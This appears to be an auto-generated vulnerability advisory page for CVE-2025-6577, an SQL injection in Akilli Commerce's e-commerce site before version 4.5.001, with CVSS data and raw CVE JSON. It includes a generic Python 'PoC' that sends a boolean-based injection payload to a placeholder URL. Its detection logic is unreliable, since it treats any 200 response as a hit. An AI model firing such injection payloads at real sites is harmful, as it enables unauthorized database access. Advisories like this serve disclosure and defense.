Security Vulnerability Report
中文
CVE-2025-6577 CVSS 9.8 CRITICAL

CVE-2025-6577

Published: 2026-05-12 10:16:44
Last Modified: 2026-05-12 10:16:44

Description

Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows SQL Injection. This issue affects E-Commerce Website: before 4.5.001.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website < 4.5.001

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # This is a generic PoC for SQL Injection vulnerability demonstration # Target: Akilli E-Commerce Website < 4.5.001 def check_sqli(url): # Attempting a basic boolean-based SQL injection test # Payload assumes a numeric parameter 'id' which is common in e-commerce sites payload = "1' OR '1'='1'--" params = { 'id': payload } try: response = requests.get(url, params=params, timeout=10) # In a real scenario, analyze response content, length, or time taken # to determine if the injection was successful. if response.status_code == 200: print(f"[+] Potential SQL Injection detected at: {response.url}") print(f"[+] Response Length: {len(response.text)}") # Further checks would involve checking for database errors or data leakage return True else: print(f"[-] Request returned status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") return False if __name__ == "__main__": target = "http://target-product-page.com/details" # Replace with actual target endpoint print(f"[*] Testing target: {target}") check_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-6577", "sourceIdentifier": "[email protected]", "published": "2026-05-12T10:16:43.647", "lastModified": "2026-05-12T10:16:43.647", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows SQL Injection.\n\nThis issue affects E-Commerce Website: before 4.5.001."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0222", "source": "[email protected]"}]}}